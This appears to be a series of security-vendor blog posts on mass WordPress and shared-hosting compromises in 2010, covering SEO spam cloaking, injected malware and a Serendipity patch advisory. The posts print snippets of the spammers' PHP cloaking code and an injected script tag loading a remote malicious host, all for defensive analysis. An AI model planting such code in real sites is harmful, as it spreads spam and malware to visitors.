SEO SPAM network – Code used and more details

Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected and the common complain I hear is that even after they clean up the SPAM, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and they left a backdoor hanging in there. So you need to find where it is.


Read More

SEO SPAM network – Details of the wp-includes infection

We have been digging lately in a large SEO SPAM network which is using thousands of compromised sites to increase their page rankings and spread malware. They are similar to the one we reported earlier affecting lean.mit.edu, but this time they seem focused only on WordPress web sites.

Sites compromised.

The list is big. Some of the ones that catched my eyes were:

Mindtouch.com (Popular open source product)
chapters.asmconline.org (American Society of Military comptrollers)
blog.woodward.edu (university)
content.hks.harvard.edu (university)
cima.ned.org (National Endowment for Democracy)
scripts.mit.edu
web.mit.edu
badminton.mit.edu
people.oregonstate.edu
whi.wts.edu
blogs.hartwick.edu
virtualcms.net

And the list goes on and on and on…
Read More

XSS on oswd.org (Open source Web design) used by spammers

http://www.oswd.org/ (Open Source design) is a popular web site used for sharing templates and web designs. They have a strong and active community and we actually used that in the past when looking for templates.

However, we started to notice lately a lot of spammers using the oswd.org site for hosting their content. Instead of having links to a viagra or a cialis web site, they were linking directly to random oswd profiles. For example:

http://www.oswd.org/user/profile/id/52781 or
http://www.oswd.org/user/profile/id/52780 or
http://www.oswd.org/user/profile/id/52792

*There are hundreds of profiles within the 526-528 range being used for that. If you search on twitter for “user profile” “oswd” you will find a bunch as well.
Read More

All the sites at the Walmart Community network hacked

We posted a few weeks ago that the main site for the Walmart community network was hacked. Well, the problem is a lot bigger than that.

They have web sites for different cities and most of them are hacked too. For example:

  • http://arkansas.walmartcommunity.com/ (65.61.140.162) – SEO spam
  • http://florida.walmartcommunity.com ( 65.61.167.225) – SEO spam (only visible to google)
  • http://chicago.walmartcommunity.com ( 65.61.140.161 ) – SEO Spam
  • http://chicago.walmartcommunity.com/wp-includes/8pmax/ – Fake AV (when coming from google
  • http://philadelphia.walmartcommunity.com/ ( 65.61.167.225 ) – SEO Spam

And probably every one of them, since I just checked the ones from their front page. But they are all using WordPress 2.8.4, hosted a Rackspace and configured the same way.


Read More

Lean.mit.edu hacked and serving spam

Interested in Viagra, Cialis and some other “magical” medications? It seems that the MIT web site for the Lean Advancement Initiative (http://lean.mit.edu/ ) knows a bit about it:


Joking aside, they got hacked and are being used to serve a lot of SPAM. In fact, we were fixing a web site that had a lot of links to it:

original viagra bestellen 
original viagra rezeptfrei
viagra droga generica
..
viagra verpackung
cialis filmtabletten
viagra kaufen test
viagra original preis
günstig viagra

The script is also a bit clever, so if you visit it without any argument, it returns a 404 (try http://lean.mit.edu/blind/products/lesat/lesat.php ).
If you visit with an argument, it shows the spam: (try http://lean.mit.edu/blind/products/lesat/lesat.php?pills=bestellen-viagra )


Read More

Continuing attacks at GoDaddy – Losotrana.com

And it is still not over. Remember the code we found last week that was hacking all the PHP files at GoDaddy?

It is still happening, but now using the losotrana.com domain ( http://losotrana.com/js.php ). This is the script that will show up on your site if you get hacked:

<script src=”http://losotrana.com/js.php”></script>

Everything else is the same as the previous attacks that infected thousands of sites. They are hacking the sites using this tool:

http://blog.sucuri.net/2010/05/found-code-used-to-inject-malware-at.html

You can clean up using this script:
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html

All the sites so far hosted at GoDaddy. If you are signed up with us, our system should have already alerted you (or it will do so very soon). Again, this is not YOUR fault! GoDaddy admitted they have a problem, but it looks like they were not able to fix it yet.

A curiosity is that this Losotrana.com site is hosted at the same domain as holasionweb.com used on the previous attack:

$ host holasionweb.com
holasionweb.com has address 188.165.200.96
$ host Losotrana.com
Losotrana.com has address 188.165.200.96

Also, all domains used on the latest attacks were registered by the same person:

Registrant Contact:
HardSoft, inc
Hilary Kneber hilarykneber@yahoo.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

The requests to infect all the files are coming from: 178.32.42.1, which is also faking Google’s referer:

178.32.42.1 - - - "GET www.x.com/simple_production.php HTTP/1.1" 200 57 "-" 
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Update: GoDaddy FTP server seems to be down.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Reply from GoDaddy regarding the latest attacks

GoDaddy just sent us an update. I am glad they are now acknowledging that they have a problem and are looking to fix it. They didn’t give more details to avoid revealing too much and helping the attackers.

No more blaming the users! I am glad with this response and hopefully they will find out what is going on and fix it.

“Early into our investigation, Go Daddy noticed a majority of exploited websites were all running WordPress. After feedback from customers, more attacks and more in-depth analysis, we modified our statement to specify the attacks targeted numerous PHP-based applications, which included WordPress.

Transparency is a core value at Go Daddy. We intend to continue our commitment to communications. There are times, however, when publicly revealing too much, such as specific code from the attack, helps the criminals causing the issue.

We are aggressively collecting data to see how the attack is maturing and to discover ways we can help prevent our customers from being impacted and shut down ‘the bad guys’ altogether. Go Daddy is leading an ongoing effort, working with industry security experts and other top hosting providers.

As part of our investigation, Go Daddy is encouraging customer input about their related website issues, which is why we set up a special form: http://www.GoDaddy.com/securityissue.

Look for further updates from Go Daddy on this topic, at http://Community.GoDaddy.com/support

- Todd Redfoot, Go Daddy Chief Information Security Officer”

Transparency is important and hopefully when they find out what happened they will do a full case study so we can all learn from that (or am I dreaming too much?)

It is not over – SEO Spam on sites infected

Did your site got hacked on the last 3 or 4 weeks? If it did, you may still have some things to clean up.

We lately started to notice in a lot of sites that we have been fixing a “.files” directory full of spam links on them. We initially thought it was some isolated incident, but then it became more often and we decided to put our scanner to work to see how many we could find.

So far, we got a list with more than a thousand sites with that (to be exact, 1,125 sites so far). These are just sites we have scanned on the last few hours, so the number is probably way bigger. Also, in our list we have sites from all major hosting companies and all web applications. So nothing specific to one company/tool.

How to find out if you are still infected? Via FTP, just list the .files directory on your web root:

.files$ ls
1 in 5 divorces refers to facebook.html
2000 year old man.html
2009 kennedy center honorees.html
2009 pro bowl.html
..
2009 pro bowl roster.html
2009 pro bowl selections.html
2010 nfl pro bowl selections.html

You will see hundreds of files in there. Via a browser, just visit http://yoursite.com/.files/

If you see a directory listing full of links you don’t know about, it means that you are still infected.

For people using our scanner, it has been alerting about that since a little while, so you were (or will be notified) soon.

Now, you ask me. Why were these files added in there? They are being used as a SEO Spam tactic to increase the page rank of the attackers sites.

They are used in conjunction with this code: MW:SPAM:S2 where it reads the content of the file only if it is being requested by a search engine:

function get_page($key){
$f_n=".files/".$key.".html";
if (@file_exists($f_n)) return @file_get_contents($f_n);

Code to check if it comes from a search engine:

$ip=sprintf("%u",ip2long($_SERVER["REMOTE_ADDR"]));
if (($ip>=3639549952)&&($ip<=3639558143))$searchengine=1; //GOOGLE (216.239.32.0-216.239.63.255)
if (($ip>=1123631104)&&($ip<=1123639295))$searchengine=1; //GOOGLE (66.249.64.0-66.249.95.255)
if (($ip>=1089052672)&&($ip<=1089060863))$searchengine=1; //GOOGLE (64.233.160.0-64.233.191.255)
if (($ip>=1078218752)&&($ip<=1078220799))$searchengine=1; //GOOGLE (64.68.80.0-64.68.87.255)
if (($ip>=1078220802)&&($ip<=1078222031))$searchengine=1; //GOOGLE (64.68.88.2-64.68.92.207)
if (($ip>=1087381508)&&($ip<=1087382952))$searchengine=1; //GOOGLE (64.208.32.4-64.208.37.168)
if (($ip>=3512041472)&&($ip<=3512045567))$searchengine=1; //GOOGLE (209.85.128.0-209.85.143.255)
if (($ip>=1113980928)&&($ip<=1113985023))$searchengine=1; //GOOGLE (66.102.0.0-66.102.15.255)
if (($ip>=1208926208)&&($ip<=1208942591))$searchengine=1; //GOOGLE (72.14.192.0-72.14.255.255)
if (($ip>=1249705984)&&($ip<=1249771519))$searchengine=1; //GOOGLE (74.125.0.0-74.125.255.255)
if (stristr($_SERVER["HTTP_USER_AGENT"],"msnbot")||stristr($_SERVER["HTTP_USER_AGENT"],"Yahoo"))$searchengine=1;
if (stristr($_SERVER["HTTP_USER_AGENT"],"via translate.google.com"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google WAP Proxy"))$searchengine=0;
if (stristr($_SERVER["HTTP_USER_AGENT"],"Google CHTML Proxy"))$searchengine=0;

Now, If a normal user visits it, they are just redirected to cnn.com and won’t really notice something wrong with it.

Clean up:

If you have this .files directory, go ahead and remove it. Also, search your main directory for a PHP file (random name) with a big base64 string. Go ahead and remove it as well.

*If anyone want the lists of sites (for research purposes only, let me know).

**btw, that has nothing to do with GoDaddy. On my list we have sites from all major hosting companies.

As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Last week attacks – Some comments and updates

Last week as a busy one.

First, thousands of GoDaddy sites got hacked with that kdjkfjskdfjlskdjf.com malware.

A few days later, hundreds of Network Solutions sites got hacked by using the php.ini/cgi-bin malware (including the US Treasury site).

The next day, more thousands of sites at different providers (GoDaddy, Dreamhost, hostgator, etc) got hacked with the MW:MROBH:1 malware.

So, what was going on?

Network Solutions attack

The problem at Network Solutions was caused by an internal application used on their hosting platform that allowed the exploit to happen. They fixed it already, so the problem should not reoccur. The number of infected sites was around 500.

GoDaddy

GoDaddy blamed the users (saying they were using old WordPress versions) and didn’t provide us with information regarding what happened. We know that WordPress wasn’t the problem (we saw sites using the latest version getting hacked), so no one knows what happened. Probably thousands of sites got hacked.

DreamHost

DreamHost contacted us and explained that in their platform the issue was caused by a “specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.”. Around 500 sites got hacked. Their statement:

We’ve seen a dozen or so examples of this passed to us via support and have researched it ourselves . It seems to be related to a specific backdoor shell that we’ve seen used in conjunction with a variety of redirect and SEO related hacks.

A scan across all our server files for known shells was done across customer HTTP servers and they were deleted . 550 account owners were contacted with notification of the finding of this backdoor shell file and the changing of their related FTP passwords. They were also provided directions for removing some of the common derivative hacks that have been associated with it, including a link to your web site and further directions to make use of SFTP exclusively due to FTP’s inherent security constraints. The great majority of these shells were added (as indicated by file date) in late November and December .

How are they getting in?

The Network Solutions issue was explained and fixed. At Dreamhost, it was a PHP shell. But how about the others? How were the attackers able to inject content on all these sites?

Skyphire (and others), in our comments, mentioned that the infected files had a PHPMyAdmin cookie added, which would indicate a bug (maybe 0-day) on PHPMyAdmin. That would be a possible cause since all those shared hosts are using PHPMyadmin. This is the cookie added:


getCookie("pma_visited_theme1");

We can’t prove it, but we will keep an eye to find out exactly what is going on. Have more info? Let us know.


As always, if you are having difficulties getting your site cleanup, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Serendipity important security update

If you are using Serendipity, stop everything you are doing and read this:

Serendipity 1.5.3 has been released, as a security-fix release with no other relevant changes.

A security issue has been discovered by Stefan Esser during the course of the Month of PHP Security. This issue was found in the WYSIWYG-Library Xinha (that Serendipity uses), and affects certain plugins to Xinha (Linker, ImageManager, ExtendedFileManager, InsertSnippet) which can use a dynamic configuration loader. This loader allows to upload file with arbitrary PHP-Code and thus allows remote code execution, even when not logged in to the Xinha/Serendipity backend.

Due to the seriousness of this bug, we urge everyone to upgrade their installations. People who don’t want the hassle of a full upgrade and are not using the mentioned Xinha-plugins actively, can simply delete the file htmlarea/contrib/php-xinha.php, which will render the mentioned plugins and exploits useless.

Now go and update your blogs as soon as possible. You can either just remove that file or do a full-blown update. Our scanner will now also alert on old versions being used.